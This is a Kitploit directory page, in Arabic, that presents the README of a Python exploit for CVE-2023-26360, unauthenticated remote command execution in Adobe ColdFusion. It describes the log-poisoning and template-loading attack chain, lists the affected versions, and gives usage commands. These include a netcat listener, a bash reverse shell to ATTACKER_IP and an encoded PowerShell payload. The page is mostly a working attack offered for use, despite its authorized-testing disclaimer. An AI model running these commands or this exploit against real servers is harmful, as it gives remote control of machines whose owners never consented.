Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Adobe_ColdFusion_RCE_Unauthenticated — يعتمد هذا الاستغلال على ثغرة CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) وقد تم بناؤه فوق وحدة Metasploit ومستودع jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit. | Kitploit
أدوات/GitHubGitHub/joaoaugustom/adobe_coldfusion_rce_unauthenticated
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubjoaoaugustom/adobe_coldfusion_rce_unauthenticated

Adobe_ColdFusion_RCE_Unauthenticated

يعتمد هذا الاستغلال على ثغرة CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) وقد تم بناؤه فوق وحدة Metasploit ومستودع jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

CVE-2023-26360 — Adobe ColdFusion هجوم تنفيذ الأوامر عن بُعد غير الموثَّق

تنفيذ بايثون لاستغلال تنفيذ الأوامر عن بُعد لـ CVE-2023-26360، بناءً على تحليل وحدة Metasploit الأصلية والعمل السابق لـ jakabakos.

لماذا هذا الاستغلال موجود؟

تحاول إثبات المفهوم (PoC) لـ jakabakos حقن <cfexecute> مباشرة في معامل _variables وقراءة المخرجات من سجل ColdFusion في خطوة واحدة. يفشل هذا الأسلوب لأن ColdFusion لا يُقيِّم وسوم CFML مضمنة في هذا السياق، مما يؤدي إلى خطأ 500 بدون تنفيذ أوامر.

يعيد هذا التنفيذ إنتاج الآلية الصحيحة ذات الخطوتين المستخدمة في وحدة Metasploit:

  1. تسميم السجل — يُرسل حمولة _variables مشوهة ({<cftry>CFML</cftry>) إلى نقطة نهاية CFC القابلة للاستغلال. يفشل ColdFusion في تحليلها ويكتب المحتوى الخام — بما في ذلك كود CFML — في coldfusion-out.log.
  2. تنفيذ القالب — يستخدم ثغرة إلغاء تسلسل اسم الفئة لتحميل ملف السجل المسموم كقالب ColdFusion، مما يتسبب في تنفيذ الخادم لكود CFML المحقون.

يتم تنفيذ الأوامر عبر java.lang.Runtime.exec() من خلال createObject، متجنباً أي اعتماد على <cfexecute>، والذي غالباً ما يكون معطلاً في البيئات المحصَّنة أو الإنتاجية.

الإصدارات المتأثرة

  • Adobe ColdFusion 2021 Update 5 والإصدارات الأقدم
  • Adobe ColdFusion 2018 Update 15 والإصدارات الأقدم

المتطلبات

root@kitploit:~
pip install -r requirements.txt

الاستخدام

ابدأ مستمعاً قبل تشغيل أداة الاستغلال:

root@kitploit:~
nc -lvnp 4444

هدف ويندوز:

root@kitploit:~
python exploit.py --host http://TARGET:8500 --win --cmd "powershell -e <BASE64_PAYLOAD>"

هدف لينكس:

root@kitploit:~
python exploit.py --host http://TARGET:8500 --cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

عبر وكيل (مثل Burp Suite):

root@kitploit:~
python exploit.py --host http://TARGET:8500 --win --cmd "whoami" --proxy http://127.0.0.1:8080

الخيارات

FlagDescription

كيف يعمل؟

root@kitploit:~
┌─────────────┐         Step 1: plant CFML          ┌──────────────────┐
│   Attacker  │ ──── POST /_variables={<cftry>...  ──► iedit.cfc        │
│             │      CF fails to parse, logs CFML     │                  │
│             │                                       │ coldfusion-      │
│             │         Step 2: trigger execution     │ out.log          │
│             │ ──── POST classname=X..\logs\cf... ──► (loaded as       │
│             │                                       │  CFML template)  │
│  Listener   │ ◄─────────────── reverse shell ───────│                  │
└─────────────┘                                       └──────────────────┘

المراجع

  • إعلان أمان Adobe
  • تحليل Rapid7 — AttackerKB
  • وحدة Metasploit
  • إثبات المفهوم لـ jakabakos

إخلاء المسؤولية

تم توفير هذه الأداة للأغراض التعليمية وتقييمات الأمان المصرح بها فقط (اختبارات الاختراق، مسابقات CTF، البيئات المخبرية). تشغيل هذا الاستغلال ضد أنظمة دون إذن خطي صريح هو أمر غير قانوني. لا يتحمل المؤلف أي مسؤولية عن أي استخدام سيء.

تنزيل الأداة
--host
عنوان URL الأساسي للهدف (مثل http://192.168.1.10:8500)
--cmdالأمر المراد تنفيذه على الهدف
--winاضبط هذا العلم إذا كان الهدف من نوع ويندوز
--proxyعنوان URL اختياري لوكيل HTTP